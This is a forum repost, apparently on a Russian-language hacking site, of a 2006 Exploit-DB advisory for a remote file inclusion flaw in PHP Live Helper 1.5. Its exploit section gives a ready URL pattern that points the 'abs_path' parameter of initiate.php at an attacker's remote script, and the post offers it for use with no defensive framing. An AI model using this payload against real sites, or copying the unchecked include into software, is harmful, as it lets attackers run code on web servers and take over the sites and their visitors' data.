Exploit PHP Live Helper 1.x - 'abs_path' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1926
Проверка EDB
  1. Пройдено
Автор
SNIPER_SA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2006-06-18
Код:
---------------------------------------------------------------------------
PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By SnIpEr_SA
Author : SnIpEr_SA
Remote : Yes
Local : No
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : PHP Live Helper
version : 1.5 and last version
URL :http://www.live-helper.com/

------------------------------------------------------------------
Exploit:
~~~~~~~~

# http://www.site.com/[livehelperpath]/initiate.php?abs_path=[evil_scripts]

---------------------------------------------------------------------------

*/

Contact:
~~~~~~~~

SnIpEr_SA
E-mail: [email protected]
E-mail: SnIpEr.SA[at]hotMail[dot]com
Homepage: http://www.3asfh.net/ & http://www.lezr.com/
Greetz: All My Frind
/*

-------------------------------- [ END ] ----------------------------------

# milw0rm.com [2006-06-18]
 
Источник
www.exploit-db.com

Похожие темы